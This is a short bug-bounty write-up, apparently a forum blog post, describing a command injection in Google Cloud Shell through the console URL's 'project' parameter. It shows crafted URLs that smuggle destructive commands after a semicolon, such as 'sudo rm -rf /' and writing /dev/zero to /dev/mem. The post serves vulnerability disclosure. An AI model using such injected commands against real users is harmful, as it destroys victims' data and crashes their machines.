View RSS Feed

Pranav venkat

Command Injection in #Google for which I got 6000$

Rating: 2 votes, 3.00 average.
Hey all ,

Few months back I found a command injection bug in Google Cloud shell

Since the title goes by the name "command injection" , you all might be thinking it as "normal Command injection which affects servers" but this vulnerability is quite different.
We can put this in different way as "Client Side command injection".

Lets get into the finding

While I was testing "console.cloud.google.com" , There was one url with this pattern

https://console.cloud.google.com/home/dashboard?project="name of the project"

Ok thats cool :v ,

Tested for IDOR ,

Crafted the url as
https://console.cloud.google.com/home/dashboard?project="Random project name"

Eg:
https://console.cloud.google.com/hom...ject=project-1 (not vulnerable to IDOR)

But reflected the name of project in Cloud shell.


So Tested for XSS ,

Crafted the url as
https://console.cloud.google.com/home/dashboard?project="XSS vector" (not vulnerable to XSS)

On activating cloud shell "there was some syntax error"

Now the creepy mind of mine came with idea :P to use delimiter ,

Crafted the url as ,
https://console.cloud.google.com/hom...oard?project=;

There was no syntax error , and cloudshell created successfully!

In linux we can chain commands using semi colon operator ,

To make this as exploitable issue , I came with these ideas,,

Crashing Victim vm :

https://console.cloud.google.com/hom...?project=;sudo cp /dev/zero /dev/mem
Once victim access the above url and click "Activate cloud shell" , his/her vm crashes.


Deleting files: (this one had much impact than previous command)

https://console.cloud.google.com/hom...?project=;sudo rm -rf /
This will delete victims root directory which also deletes appengine files!

According to my research: Once the victim access the crafted url , Victim must click "Activate cloud shell" , in order to make the attack successful!

For more details and poc:

You can refer here->

http://www.pranav-venkat.com/2016/03...t-me-6000.html

a

Updated 03-16-2016 at 02:08 PM by 41.w4r10r

Categories
Uncategorized

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: